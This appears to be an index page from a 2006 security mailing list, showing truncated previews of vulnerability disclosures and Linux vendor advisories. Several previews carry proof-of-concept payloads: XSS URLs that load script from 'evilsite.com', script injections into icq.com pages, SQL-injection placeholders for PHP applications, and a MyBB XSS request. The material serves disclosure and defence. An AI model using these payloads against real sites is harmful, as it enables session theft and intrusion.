Chemical Directory v.unknown (doesnt say on website)

Homepage:

http://www.scriptsez.net/

Effected files:

dictionary.php

XSS Vulnerability via keyword variable:

http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT SRC=http://evilsite.com/xss.js][/SCRIPT]

[ more ]  [ reply ]

vSCAL and vREAL v1.0

Homepage:

http://www.babykatiemedia.com/

Effected files:

index.php

myslideshow.php

XSS Vulnerability via lid variable:

http://www.example.com/vscal/index.php?page=showlisting&lid=<SCRIPT%20SR
C=evilsite.com//xss.js></SCRIPT>

XSS Vulnerability via myslideshow.php

[ more ]  [ reply ]

Produce : Mafia Moblog

WebSite :http://mafia.pearlabs.org

Version : 6 Full and Prior

Discovred By :Moroccan Security Research Team (Simo64)

IMPACT : Manipulation of data, System access

[+] Full Path Disclosure :

The problem is that it is possible to disclose the full path to 'big.php','upgr

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:098
http://www.mandriva.com/security/
____________________________________________________________________

[ more ]  [ reply ]

PBLGuestbook v1.31

Homepage:

http://www.pixelatedbylev.com/

Effected files:

input boxes of the guestbook.

XSS Vulnerabilities PoC:

I noticed that common tags like <script> are filtered into the words "SCRIPT BLOCKED" in this guestbook, however img tags as well as others go unfiltered i

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:097
http://www.mandriva.com/security/
____________________________________________________________________

[ more ]  [ reply ]

===========================================================
Ubuntu Security Notice USN-291-1 June 08, 2006
freetype vulnerabilities
CVE-2006-0747, CVE-2006-1861, CVE-2006-2493, CVE-2006-2661
===========================================================

A security issue affects the follo

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:096
http://www.mandriva.com/security/
____________________________________________________________________

[ more ]  [ reply ]

---------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated squirrelmail package fixes security issues
Advisory ID: FLSA:190884
Issue date: 2006-06-06
Product: Red Hat Linux, Fedora Core
Keyword

[ more ]  [ reply ]

---------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated ipsec-tools package fixes security issue
Advisory ID: FLSA:190941
Issue date: 2006-06-06
Product: Fedora Core
Keywords: Bugfi

[ more ]  [ reply ]

---------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated firefox package fixes security issues
Advisory ID: FLSA:189137-2
Issue date: 2006-06-06
Product: Fedora Core
Keywords: Bugfix, Security
CVE

[ more ]  [ reply ]

======================================

DISCOVERED BY: CrAzY CrAcKeR

Site:www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-LoverHacker-Breeeeh

BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs

======================================

Example:

/print/month.php?cid=&catid=[SQL]

/print/m

[ more ]  [ reply ]

*/ Federico Fazzi, <federico (at) autistici (dot) org [email concealed]>
*/ MiraksGalerie <= 2.62 Remote command execution
*/ 07/06/2006 4:58

Bug:

pcltar.lib.php: line 34 - 35

---
if (!isset($g_pcltar_lib_dir))
$g_pcltar_lib_dir = "lib";
[etc..]
---

galimage.lib.php: line: 157 - 158

---
for($i=count($listconfigfile)-1;

[ more ]  [ reply ]

---------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated X.org packages fix security issue
Advisory ID: FLSA:190777
Issue date: 2006-06-06
Product: Fedora Core
Keywords: Bugfix
CVE N

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

http://www.icq.com/groups/atoz.php?letter=%3Cscript%3Ealert('find%20by%2
0a1i%20%20en')%3C/script%3E

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

---------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated mozilla packages fix security issues
Advisory ID: FLSA:189137-1
Issue date: 2006-06-06
Product: Red Hat Linux, Fedora Core
Keywords: Bugfix,

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

===================================

DISCOVERED BY: CrAzY CrAcKeR

Site:www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-LoverHacker-Breeeeh

BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs

===================================

Example:-

/vs_resource.php?ID=[SQL]

================

[ more ]  [ reply ]

rPath Security Advisory: 2006-0096-1
Published: 2006-06-07
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Remote Root Deterministic Unauthorized Access
Updated Versions:
spamassassin=/conary.rpath.com@rpl:devel//1/3.0.6-0.1-1

References:
http://www.cve.mitre.org/cg

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

// MyBB 1.1.2 New XSS

File :- private.php

Ver. :- $do = $mybb->input['do'];

Line :- 260

Action :- Preview

HTTP Proof :-

/mybb/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=adva
nced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&a
ction=do_

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Microsoft NetMeeting memory corruption (Brief)

Classification:
===============
Level: [LOW]-med-high-crit
ID: HEXVIEW*2006*06*06*01
URL: http://www.hexview.com/docs/20060606-1.txt

Overview:
=========
Microsoft NetMeeting is an application that provid

[ more ]  [ reply ]

http://www.icq.com/register/thanks.php?service=&uin=1%3Cscript%3Ealert(1
23);%3C/script%3E&newuser=1

[ more ]  [ reply ]

INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY

http://www.intruders.com.br/

http://www.intruders.org.br/

ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)

PRIORITY: HIGH

I - INTRUDERS:

----------------

Intruders Tiger Team Security is a project entailed with

S

[ more ]  [ reply ]

http://www.icq.com/people/?searched=1&keyword2=&my_gender=[XSS]&match=[X
SS]&age_group=[XSS]&home_cc=[XSS]

http://www.icq.com/groups/group_details.php?gid=12052128

http://www.icq.com/people/?searched=1&keyword2=&my_gender=[XSS]&match=[X
SS]&age_group=[XSS]&home_cc=[XSS]

[ more ]  [ reply ]